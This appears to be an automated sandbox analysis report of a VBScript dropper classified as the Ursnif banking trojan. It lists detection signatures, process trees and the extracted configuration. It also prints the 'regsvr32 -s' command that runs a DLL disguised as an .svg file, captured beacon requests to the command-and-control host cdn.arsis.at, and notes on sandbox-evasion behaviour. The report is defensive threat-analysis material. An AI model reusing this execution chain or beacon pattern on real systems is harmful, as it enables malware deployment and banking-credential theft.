
Analysis Report description#_63033.vbs

Overview

General Information

Sample Name: description#_63033.vbs
MD5: 3c96bf8a25b8555eadd3127ba2fe6e02
SHA1: 0bb99baf23f4e0ad75cf60da01085f5e6a086d46
SHA256: eea5debef2bdb29e6c596517aa26b6d39edcac02e161d2730d81dbc66bef4ab5


Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5204 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_63033.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 5464 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\GMT.svg MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5456 cmdline: -s C:\Users\user\AppData\Local\Temp\GMT.svg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5752 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4392 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4272 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3472 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5156 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5992 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5156 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5148 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5504 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5148 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "316", "system": "7a088834846a336e4c3b5e2556ff89a9", "size": "0", "crc": "1", "action": "00000000", "id": "1100", "time": "1592968214", "user": "31b341dd54c8a3b79c4b2eb586cfb939", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth | Data: Command: -s C:\Users\user\AppData\Local\Temp\GMT.svg, CommandLine: -s C:\Users\user\AppData\Local\Temp\GMT.svg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\GMT.svg, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5464, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\GMT.svg, ProcessId: 5456

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\GMT.svg | Avira: detection malicious, Label: HEUR/AGEN.1047219
Found malware configuration
Source: regsvr32.exe.5456.3.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "316", "system": "7a088834846a336e4c3b5e2556ff89a9", "size": "0", "crc": "1", "action": "00000000", "id": "1100", "time": "1592968214", "user": "31b341dd54c8a3b79c4b2eb586cfb939", "hash": "0x00000000", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\GMT.svg | Virustotal: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\GMT.svg | ReversingLabs: Detection: 48%
Multi AV Scanner detection for submitted file
Source: description#_63033.vbs | Virustotal: Detection: 28%
Source: description#_63033.vbs | ReversingLabs: Detection: 20%

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEC12A7 FindFirstFileExA
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: GET /api1/pCiPzFstbCpkQ8/TIrAoOyIGtuKu5xCRH1h3/QA3JkiiY_2F06Cp1/BjmCEzGHzcS19cM/RtaHwNb0qQxo31HD8B/WyBjpGZvU/6qm2gFlQJzfLAq9YcGPE/iRPW9xGkJoDsXoZiGFd/rHTh_2BiKgAkAULz4l85x5/QmZiyhGj_2FqU/qnrZh_2B/Z61VmMhexWvGi_2Blho2ekM/Y5_2FtJhhA/nZNrxn1hy4RLoqwr1/CAAcH4SOwVWq/m_2ByN5G8tw/m9aLf1n0UIiKLc/SY0f_0A_0DPJ9DbIe0gBS/_2Fmx_2B2o9ygsaH/W9G_2FnHS4PZpKF/ppekxAfzDt7_2BMMsJ/eMNlr77lNzjegi_2F/x HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: cdn.arsis.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/LLex4_2FwVx5cugO/n3OGkDZ90rNlnmK/NK2hclnVmGlSN0HRtM/Dq4EirByR/0dKXlLez17EFg7rVeGjD/q6FC07kjcPHgU0bfnsM/e4lbJaMZHng10ZZKx79UVY/XGa7AzX8rWqH0/QUkuJKgG/IBPqzhs5gzL9yu7oa108yFs/BHTM32XLyG/FGdFosTHK_2FB5T_2/FLugq_2FdOeX/4cadEWZpJTt/Tlk910_2BQ9jOr/s4sGYa0Qwz4yxJ20fDG3_/2BdGREKE5ZTWKKdK/_0A_0Dp1DF_2BU9/_2Fhye5Q_2FcV86d0z/uZonvJVBg/Aq_2BYp_2BSL76e_2Bgh/eDgNE3mdPpty090Go1s/zSAXt HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: cdn.arsis.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/OOTq55LgPF0lV/NWLm9usy/r9pBPGN0cyr_2FnKSW11TGD/p_2Bqq5xzp/bqt65HWOw5uwz3XYy/daVmrfViFuKV/aL_2FunD9AH/sTYB_2BP5uqUMf/XMYtIbjUiqeDNmyKEniWO/4w6SGU_2B2sS6kvy/T8k88aiA8HFWwyQ/fKHJ_2FP1GKD_2BvmX/tcB6rMWle/QiGS1_2Fx_2FqHi7KlH6/hFnwvqkFyCxNF43D97u/BvprqgTBoDscOWEgSh_2BI/sj7Jbny2sgnxc/8wV8c5Tp/fnu_0A_0D9ikOxUPwsOuGM7/_2FnSJOOqX/TReLTOVqlt9iemKMX/0l1e_2B3Rklf/n2lCnAAWbpkKOeP/8YIa HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: cdn.arsis.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/pU3aiHxRLfRNi0Z8e/yIC3OOTyW_2F/cI2WGvRE0LH/ANN_2FLHh52Cf7/inEFf06IedP8CO5UnACKb/5YDEhlC6l1Kof81q/OX9O_2FZp1IZodx/i_2BYnByoNoZ_2B3p2/OuPAcR1bY/RuIEAxMDCO8AIwK_2B6P/UE_2Fwko_2BAWLfGCWL/jSUQofLZ_2BSojwc5JqOcY/_2FSTtjByfZop/5mLVpw5Z/HKE9wwmCiUkcp5Zj0Cz_2Bb/nn9wwdmosx/6h3xU2aYoPydAlgPc/Vix3Mm2WT_0A/_0DnWsGULFN/pqJd0_2FFMdQr1/eMHo6LK1u4bp3ZaUfzKti/l4nX9h9fvslQT_2B/A9gAe2do9P/vVh HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: cdn.arsis.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/cp14uOrShOCqrIBvaJwoU7/C1FlExG7vaQoO/oJRqPiaa/5WhdZJLO4jSCA4RcPHoQChu/5GbtwiDumo/CG8Pe9vhOq3ffG_2B/EI1RQr2sA7kJ/TY_2FG_2FOJ/M7eR0stTroiUgG/EHlfgNAc1FZcB0jl13lib/70jQVFO_2FxbMItS/VuyvCLu7S0oGHKq/83w4CudEKbc9z_2FZ5/nI6sLfNtc/I6kCYLmX6FK_2Fu9ElCv/m7BDddNu2xMzZoIYECV/2FK4pTSvhlMnL7UF_0A_0D/sAC3l2Bl4CeAL/6QqGO4YS/8JlJVKgQNUmPGo0Qk83PTki/dgeVrDhA6f/glYwm_2Fd/hfxXCEn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: cdn.arsis.at
Source: global traffic | HTTP traffic detected: GET /api1/pPmVDApf9Jk/ZOcPpY_2BcGOxp/O5_2FCNO_2BefOehBweDN/S_2BPozG8s5mPJP_/2F0L5Qd5lD4tI_2/BedNyMiB06sLGBPcAo/gOuddF4kG/1WNaC8U_2FZHNmMZd_2B/t6pptm3Vi1ckxmvPxXl/E_2BlM2AwjD_2Fnt0394Uk/yRATaCV4V5ZkP/G3HwAyhV/z2uJmfq7RM8_2BOt3lrYBQk/HVFD9NqJl3/C4YbNfngw6uFsyjaJ/8ibqwmrYbnIc/A2gcb_2Faij/qjBinzNjDFq74v/KlX_0A_0DyAmOWez70jue/jW2FDMGv0ol7wr_2/Fs6kqB3iEDyxOjopoCH/Ww HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: cdn.arsis.at
Source: global traffic | HTTP traffic detected: GET /api1/BGWoEYk29tf8z2q4/qZfME9SHMNsMIpo/oUVtIl6wj30znXE8rD/U2gcm5wkB/dr7Yo05FxjRu2AyzvKHP/wNep0VHmd8s6GmfWJYR/EmPV_2FGDMJ_2BT1LoC68y/FEXkzEamk_2B2/ZfPHdzVG/zLuaszOmxb8v2lW6EHY2vim/Jdbbnr6s7L/30uod05uuwDsFyCEL/NBaFHAMs3phn/UuABi7i4VTd/YpYqqq68Dj9xo7/5_2Fk3ohiQasHWrBLtnuw/gOB1FOdA_2B881_0/A_0D6acn5JmzFTf/T4rprrvPyIPDIr_2Fm/SY8fTTRhR/L7r7d8if3yJ62n7xjgPK/EjuZYJ2Fz5_2F/l HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: cdn.arsis.at
Source: msapplication.xml0.11.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x110b320f,0x01d649d5</date><accdate>0x110b320f,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.11.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x110b320f,0x01d649d5</date><accdate>0x110b320f,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.11.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1115fead,0x01d649d5</date><accdate>0x1115fead,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.11.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1115fead,0x01d649d5</date><accdate>0x1117576f,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.11.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x111b657b,0x01d649d5</date><accdate>0x111b657b,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.11.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x111b657b,0x01d649d5</date><accdate>0x111b657b,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Jun 2020 18:10:19 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: regsvr32.exe, 00000003.00000002.1725480766.0000000000598000.00000004.00000001.sdmp | String found in binary or memory: http://cdn.arsis.at/94
Source: regsvr32.exe, 00000003.00000003.1654577172.0000000000596000.00000004.00000001.sdmp | String found in binary or memory: http://cdn.arsis.at/EL
Source: regsvr32.exe, 00000003.00000003.1662648058.000000000059B000.00000004.00000001.sdmp | String found in binary or memory: http://cdn.arsis.at/api1/BGWoEYk29tf8z2q4/qZfME9SHMNsMIpo/oUVtIl6wj30znXE8rD/U2gcm5wkB/dr7Yo05FxjRu2
Source: wscript.exe, 00000000.00000002.948181155.000001FCBBB0D000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000002.948181155.000001FCBBB0D000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000002.948181155.000001FCBBB0D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: msapplication.xml.11.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.11.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.11.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.11.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.11.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.11.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.11.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.11.dr | String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000003.834965257.000001FCBBB32000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1bD467
Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.921958922.000001FCB9565000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.858717915.000001FCB862E000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.946555898.000001FCB9663000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.936125270.000001FCB8629000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1bP467
Source: wscript.exe, 00000000.00000003.921958922.000001FCB9565000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1bP467tem
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA15F3 NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA18DB NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA2775 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E3A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001EAEB5 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA2554
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001EAC94
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E15D6
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEBAB78
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEC6321
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\GMT.svg 18D16E00C1AEC23905194CAA6929EFD4AF4A8613CFEC674E0752033A891B7C33
Source: description#_63033.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: GMT.svg.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.bank.troj.evad.winVBS@16/19@9/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_63033.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: description#_63033.vbs | Virustotal: Detection: 28%
Source: description#_63033.vbs | ReversingLabs: Detection: 20%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_63033.vbs'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\GMT.svg
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\GMT.svg
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5156 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5148 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\GMT.svg
